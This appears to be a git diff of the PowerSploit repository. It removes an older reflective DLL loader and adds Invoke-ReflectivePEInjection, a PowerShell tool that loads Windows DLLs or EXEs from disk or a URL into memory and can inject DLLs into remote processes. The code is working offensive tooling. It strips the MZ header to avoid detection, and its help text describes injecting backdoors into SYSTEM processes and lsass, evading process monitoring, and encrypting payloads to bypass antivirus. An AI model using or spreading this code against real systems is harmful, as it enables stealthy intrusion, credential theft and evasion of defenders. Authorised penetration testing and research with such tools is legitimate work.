DLL, DLLName: $ImportDllPath" - } - - #Get the first thunk, then loop through all of them - [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($DllInfo.DllHandle) ($ImportDescriptor.FirstThunk) - [IntPtr]$ThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ThunkRef, [IntPtr]) - - while ($ThunkRefVal -ne [IntPtr]::Zero) - { - $ProcedureName = '' - #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit - # If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint - # and doing the comparison, just see if it is less than 0 - if([Int64]$ThunkRefVal -lt 0) - { - $IMAGE_ORDINAL = 0xFFFF - $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(([Int64]$ThunkRefVal -band $IMAGE_ORDINAL)) - } - else - { - $StringAddr = Add-SignedIntAsUnsigned ($DllInfo.DllHandle) ($ThunkRefVal) - $StringAddr = Add-SignedIntAsUnsigned ($StringAddr) ([System.Runtime.InteropServices.Marshal]::SizeOf([UInt16])) - $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr) - } - - [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddress.Invoke($ImportDllHandle, $ProcedureName) - if ($NewThunkRef -eq $null) - { - Throw "New function reference is null, this is almost certainly a bug in this script" - } - - [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false) - - $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr])) - $ThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ThunkRef, [IntPtr]) - } - - $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_IMPORT_DESCRIPTOR)) - } - } - } - - Function Get-VirtualProtectValue - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [UInt32] - $SectionCharacteristics - ) - - $ProtectionFlag = 0x0 - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0) - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) - { - $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE - } - else - { - $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ - } - } - else - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) - { - $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY - } - else - { - $ProtectionFlag = $Win32Constants.PAGE_EXECUTE - } - } - } - else - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) - { - $ProtectionFlag = $Win32Constants.PAGE_READWRITE - } - else - { - $ProtectionFlag = $Win32Constants.PAGE_READONLY - } - } - else - { - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) - { - $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY - } - else - { - $ProtectionFlag = $Win32Constants.PAGE_NOACCESS - } - } - } - - if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0) - { - $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE - } - - return $ProtectionFlag - } - - Function Update-MemoryProtectionFlags - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [System.Object] - $DllInfo, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Constants, - - [Parameter(Position = 3, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - for( $i = 0; $i -lt $DllInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) - { - [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$DllInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_SECTION_HEADER))) - $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, $Win32Types.IMAGE_SECTION_HEADER) - [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($DllInfo.DllHandle) ($SectionHeader.VirtualAddress) - - [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics - [UInt32]$SectionSize = $SectionHeader.VirtualSize - - $OldProtectFlag = 0 - Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -DllInfo $DllInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null - $Success = Invoke-Win32 "kernel32.dll" ([Bool]) "VirtualProtect" @([IntPtr], [UInt32], [UInt32], [Ref]) @($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag) - if ($Success -eq $false) - { - Throw "Unable to change memory protection" - } - } - } - - - ##################################### - ########## FUNCTIONS ########### - ##################################### - Function Get-MemoryProcAddress - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [IntPtr] - $DllHandle, - - [Parameter(Position = 1, Mandatory = $true)] - [String] - $FunctionName - ) - - $Win32Types = Get-Win32Types - $DllInfo = Get-DllDetailedInfo -DllHandle $DllHandle -Win32Types $Win32Types - - #Get the export table - if ($DllInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0) - { - return [IntPtr]::Zero - } - $ExportTablePtr = Add-SignedIntAsUnsigned ($DllHandle) ($DllInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress) - $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, $Win32Types.IMAGE_EXPORT_DIRECTORY) - - for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++) - { - #AddressOfNames is an array of pointers to strings of the names of the functions exported - $NameOffsetPtr = Add-SignedIntAsUnsigned ($DllHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([UInt32]))) - $NamePtr = Add-SignedIntAsUnsigned ($DllHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [UInt32])) - $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr) - - if ($Name -ceq $FunctionName) - { - #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions - # which contains the offset of the function in to the DLL - $OrdinalPtr = Add-SignedIntAsUnsigned ($DllHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([UInt16]))) - $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [UInt16]) - $FuncOffsetAddr = Add-SignedIntAsUnsigned ($DllHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([UInt32]))) - $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [UInt32]) - return Add-SignedIntAsUnsigned ($DllHandle) ($FuncOffset) - } - } - - return [IntPtr]::Zero - } - - - Function Invoke-MemoryLoadLibrary - { - Param( - [Parameter( Position = 0, Mandatory = $true )] - [Byte[]] - $DllBytes - ) - - #Get Win32 constants and functions - $Win32Constants = Get-Win32Constants - $Win32Functions = Get-Win32Functions - $Win32Types = Get-Win32Types - - - #Get basic DLL information - Write-Verbose "Getting basic DLL information from the file" - $DllInfo = Get-DllBasicInfo -DllBytes $DllBytes -Win32Types $Win32Types - $OriginalImageBase = $DllInfo.OriginalImageBase - - - #Verify that the DLL and the current process are the same bits - $Process64Bit = $true - if ([System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr]) -ne 8) - { - $Process64Bit = $false - } - if ($Process64Bit -ne $DllInfo.Dll64Bit) - { - Throw "DLL platform doesn't match process platform" - } - - - #Allocate memory and write the DLL to memory. Always allocating to random memory address so I have pretend ASLR - Write-Verbose "Allocating memory for the DLL and write its headers to memory" - $DllHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$DllInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) - [IntPtr]$DllEndAddress = Add-SignedIntAsUnsigned ($DllHandle) ([Int64]$DllInfo.SizeOfImage) - if ($DllHandle -eq [IntPtr]::Zero) - { - Throw "VirtualAlloc failed to allocate memory." - } - - [System.Runtime.InteropServices.Marshal]::Copy($DllBytes, 0, $DllHandle, $DllInfo.SizeOfHeaders) | Out-Null - - - #Now that the DLL is in memory, get more detailed information about it - Write-Verbose "Getting detailed Dll information from the headers loaded in memory" - $DllInfo = Get-DllDetailedInfo -DllHandle $DllHandle -Win32Types $Win32Types - $DllInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $DllEndAddress - - - #Copy each section from the DLL in to memory - Write-Verbose "Copy DLL sections in to memory" - Copy-Sections -DllBytes $DllBytes -DllInfo $DllInfo -Win32Functions $Win32Functions -Win32Types $Win32Types - - - #Update the memory addresses hardcoded in to the Dll based on the memory address the Dll was expecting to be loaded to vs where it was actually loaded - Write-Verbose "Update memory addresses based on where the Dll was actually loaded in memory" - Update-MemoryAddresses -DllInfo $DllInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types - - - #The DLL we are in-memory loading has DLLs it needs, import those DLLs for it - Write-Verbose "Import DLL's needed by the DLL we are loading" - Import-DllImports -DllInfo $DllInfo -Win32Functions $Win32Functions -Win32Types $Win32Types - - - #Update the memory protection flags for all the memory just allocated - Write-Verbose "Update memory protection flags" - Update-MemoryProtectionFlags -DllInfo $DllInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types - - - #Call DllMain so the DLL knows it has been loaded - Write-Verbose "Calling dllmain so the DLL knows it has been loaded" - $DllMainPtr = Add-SignedIntAsUnsigned ($DllInfo.DllHandle) ($DllInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) - $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) - $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) - - $DllMain.Invoke($DllInfo.DllHandle, 1, [IntPtr]::Zero) | Out-Null - - return ($DllInfo.DllHandle) - } - - - Function Main - { - #Load the DLL reflectively - Write-Verbose "Calling Invoke-MemoryLoadLibrary" - $DllHandle = Invoke-MemoryLoadLibrary -DllBytes $DllBytes - if ($DllHandle -eq [IntPtr]::Zero) - { - Throw "Unable to load DLL, handle returned is NULL" - } - - - - ######################################### - ### YOUR CODE GOES HERE - ######################################### - switch ($FuncReturnType) - { - 'WString' { - Write-Verbose "Calling function with WString return type" - [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -DllHandle $DllHandle -FunctionName "WStringFunc" - if ($WStringFuncAddr -eq [IntPtr]::Zero) - { - Throw "Couldn't find function address." - } - $WStringFuncDelegate = Get-DelegateType @() ([IntPtr]) - $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) - [IntPtr]$OutputPtr = $WStringFunc.Invoke() - $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) - Write-Output $Output - } - - 'String' { - Write-Verbose "Calling function with String return type" - [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -DllHandle $DllHandle -FunctionName "StringFunc" - if ($StringFuncAddr -eq [IntPtr]::Zero) - { - Throw "Couldn't find function address." - } - $StringFuncDelegate = Get-DelegateType @() ([IntPtr]) - $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate) - [IntPtr]$OutputPtr = $StringFunc.Invoke() - $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr) - Write-Output $Output - } - - 'Void' { - Write-Verbose "Calling function with Void return type" - [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -DllHandle $DllHandle -FunctionName "VoidFunc" - if ($VoidFuncAddr -eq [IntPtr]::Zero) - { - Throw "Couldn't find function address." - } - $VoidFuncDelegate = Get-DelegateType @() ([Void]) - $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate) - $VoidFunc.Invoke() | Out-Null - } - } - ######################################### - ### END OF YOUR CODE - ######################################### - - - Write-Verbose "Done!" - } - - Main -} - -#Main function to either run the script locally or remotely -Function Main -{ - [Byte[]]$DllBytes = $null - - if ($PsCmdlet.ParameterSetName -ieq "LocalFile") - { - Get-ChildItem $DllPath -ErrorAction Stop | Out-Null - [Byte[]]$DllBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $DllPath)) - } - else - { - $WebClient = New-Object System.Net.WebClient - - [Byte[]]$DllBytes = $WebClient.DownloadData($DllUrl) - } - - #Verify the image is a valid PE file - $e_magic = ($DllBytes[0..1] | % {[Char] $_}) -join '' - - if ($e_magic -ne 'MZ') - { - throw 'Dll is not a valid PE file.' - } - - # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg - # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be. - $DllBytes[0] = 0 - $DllBytes[1] = 0 - - if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") - { - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($DllBytes, $FuncReturnType) - } - else - { - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($DllBytes, $FuncReturnType) -ComputerName $ComputerName - } -} - -Main -}
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 new file mode 100644 index 0000000..b582847 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -0,0 +1,2852 @@ +function Invoke-ReflectivePEInjection +{ +<# +.SYNOPSIS + +Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + +PowerSploit Function: Invoke-ReflectivePEInjection +Author: Joe Bialek, Twitter: @JosephBialek +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, +or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, +please lead the Notes section (GENERAL NOTS) for information on how to use them. + + +1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. +Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. + +This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, +this will load and execute the DLL/EXE in to memory without writing any files to disk. + + +2.) Reflectively load a DLL in to memory of a remote process. +As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. + +This is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output +from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the +remote process. + + +While this script provides functionality to specify a file to load from disk or from a URL, these are more for demo purposes. The way I'd recommend using the script is to create a byte array +containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will +bypass A/V. Another advantage is you won't be making web requests. + +.PARAMETER PEPath + +The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. + +.PARAMETER PEUrl + +A URL containing a DLL/EXE to load and execute. + +.PARAMETER ComputerName + +Optional, an array of computernames to run the script on. + +.PARAMETER FuncReturnType + +Optional, the return type of the function being called in the DLL. Default: Void + Options: String, WString, Void. See notes for more information. + IMPORTANT: For DLLs being loaded remotely, only Void is supported. + +.PARAMETER ProcName + +Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this. + +.PARAMETER ProcId + +Optional, the process ID of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this. + +.PARAMETER ExeArgs + +Optional, command-line arguments to pass to the exe. + +.EXAMPLE + +Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString + +Description +----------- +Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). +Note that the file name on the website can be any file extension. + +.EXAMPLE + +Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local + +Description +----------- +Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). + +.EXAMPLE + +Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) + +Description +----------- +Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print +the wchar_t* returned by WStringFunc() from all the computers. + +.EXAMPLE + +Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" + +Description +----------- +Load DemoEXE and run it locally. + +.EXAMPLE + +Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local + +Description +----------- +Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. + +.NOTES + +GENERAL NOTES: + +The script has 3 basic sets of functionality: + +1.) Reflectively load a DLL in to the PowerShell process + -Can return DLL output to user when run remotely or locally. + -Cleans up memory in the PS process once the DLL finishes executing. + -Great for running pentest tools on remote computers without triggering process monitoring alerts. + -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info. + +2.) Reflectively load an EXE in to the PowerShell process. + -Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally. + -Cleans up memory in the PS process once the DLL finishes executing. + -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts. + +3.) Reflectively inject a DLL in to a remote process. + -Can NOT return DLL output to the user when run remotely OR locally. + -Does NOT clean up memory in the remote process if/when DLL finishes execution. + -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. + -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. + + +DLL LOADING NOTES: + +PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. +If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL +return a char* or wchar_t*, which PowerShell can take and read the output from. Anything output from stdout which is run using powershell +remoting will not be returned to you. If you just run the PowerShell script locally, you WILL be able to see the stdout output from +applications because it will just appear in the console window. The limitation only applies when using PowerShell remoting. + +For DLL Loading: +Once this script loads the DLL, it calls a function in the DLL. There is a section near the bottom labeled "YOUR CODE GOES HERE" +I recommend your DLL take no parameters. I have prewritten code to handle functions which take no parameters are return +the following types: char*, wchar_t*, and void. If the function returns char* or wchar_t* the script will output the +returned data. The FuncReturnType parameter can be used to specify which return type to use. The mapping is as follows: +wchar_t* : FuncReturnType = WString +char* : FuncReturnType = String +void : Default, don't supply a FuncReturnType + +For the whcar_t* and char_t* options to work, you must allocate the string to the heap. Don't simply convert a string +using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns. + +The function name expected in the DLL for the prewritten FuncReturnType's is as follows: +WString : WStringFunc +String : StringFunc +Void : VoidFunc + +These function names ARE case sensitive. To create an exported DLL function for the wstring type, the function would +be declared as follows: +extern "C" __declspec( dllexport ) wchar_t* WStringFunc() + + +If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify +this script to accomodate this. You can find the code to modify in the section labeled "YOUR CODE GOES HERE". + +Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection + +.LINK + +http://clymb3r.wordpress.com/ + +Master Github repo: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection + +Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ + +Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ + +#> + + [CmdletBinding(DefaultParameterSetName="WebFile")] + Param( + [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] + [String] + $PEPath, + + [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] + [Uri] + $PEUrl, + + [Parameter(Position = 1)] + [String[]] + $ComputerName, + + [Parameter(Position = 2)] + [ValidateSet( 'WString', 'String', 'Void' )] + [String] + $FuncReturnType = 'Void', + + [Parameter(Position = 3)] + [String] + $ExeArgs, + + [Parameter(Position = 4)] + [Int32] + $ProcId, + + [Parameter(Position = 5)] + [String] + $ProcName + ) + + Set-StrictMode -Version 2 + + + $RemoteScriptBlock = { + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Byte[]] + $PEBytes, + + [Parameter(Position = 1, Mandatory = $false)] + [String] + $FuncReturnType, + + [Parameter(Position = 2, Mandatory = $false)] + [Int32] + $ProcId, + + [Parameter(Position = 3, Mandatory = $false)] + [String] + $ProcName + ) + + ################################### + ########## Win32 Stuff ########## + ################################### + Function Get-Win32Types + { + $Win32Types = New-Object System.Object + + #Define all the structures/enums that will be used + # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html + $Domain = [AppDomain]::CurrentDomain + $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) + $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] + + + ############ ENUM ############ + #Enum MachineType + $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16]) + $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null + $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null + $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null + $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null + $MachineType = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType + + #Enum MagicType + $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16]) + $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null + $MagicType = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType + + #Enum SubSystemType + $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16]) + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null + $SubSystemType = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType + + #Enum DllCharacteristicsType + $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16]) + $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null + $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null + $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null + $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null + $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null + $DllCharacteristicsType = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType + + ########### STRUCT ########### + #Struct IMAGE_DATA_DIRECTORY + $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8) + ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null + ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null + $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY + + #Struct IMAGE_FILE_HEADER + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20) + $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null + $IMAGE_FILE_HEADER = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER + + #Struct IMAGE_OPTIONAL_HEADER64 + $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240) + ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null + ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null + ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null + ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null + ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null + ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null + ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null + ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null + ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null + ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null + ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null + ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null + ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null + 